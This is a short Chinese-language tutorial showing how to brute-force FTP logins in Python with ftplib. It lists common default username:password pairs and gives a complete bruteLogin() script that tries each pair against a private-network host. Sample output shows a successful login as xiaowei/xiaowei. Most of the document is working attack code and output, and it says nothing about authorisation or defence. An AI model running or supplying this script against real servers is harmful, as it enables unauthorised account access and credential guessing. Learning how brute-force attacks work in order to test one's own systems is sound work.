Python编程–使用Ftplib破解FTP用户口令
暴力破解FTP用户名/密码,假设用户名/密码对是存储在一个纯文本文件中。如下所示:
administrator:password
admin:12345
root:secret
guest:guest
root:toor
xiaowei:xiaowei
kali_lxw:kali
创建一个名为bruteLogin()的函数,这个函数接收的参数是主机名和含有密码的文件,返回一个能登录该主机的用户名/密码。该函数逐行读取文件中的每一行记录,用户名和密码之间是以冒号分隔的。然后函数尝试用这个用户名和密码登录FTP服务器。如果成功,则返回一个用户名和密码的tuple。如果失败,跳过该异常继续到下一行。如果函数穷尽所有行仍未成功登录,则返回一个值为None 、None的tuple。
示例代码如下:
import ftplib
def bruteLogin(hostname, passwdFile):
with open(passwdFile, 'r') as pF:
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
print(f'[+] Trying {userName}/{passWord}')
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print(f'\n[*] {str(hostname)} FTP Logon Succeeded: {userName}/{passWord}')
ftp.quit()
return (userName, passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials')
return (None, None)
host = '192.168.31.82'
passwdFile = 'userpass.txt'
bruteLogin(host, passwdFile)
通过遍历用户名/密码对的列表后, 最终找到了一个有效的用户名/密码对:xiaowei/xiaowei。运行结果如下所示:
[+] Trying administrator/password
[+] Trying admin/12345
[+] Trying root/secret
[+] Trying guest/guest
[+] Trying root/toor
[+] Trying xiaowei/xiaowei
[*] 192.168.31.82 FTP Logon Succeeded: xiaowei/xiaowei
Process finished with exit code 0
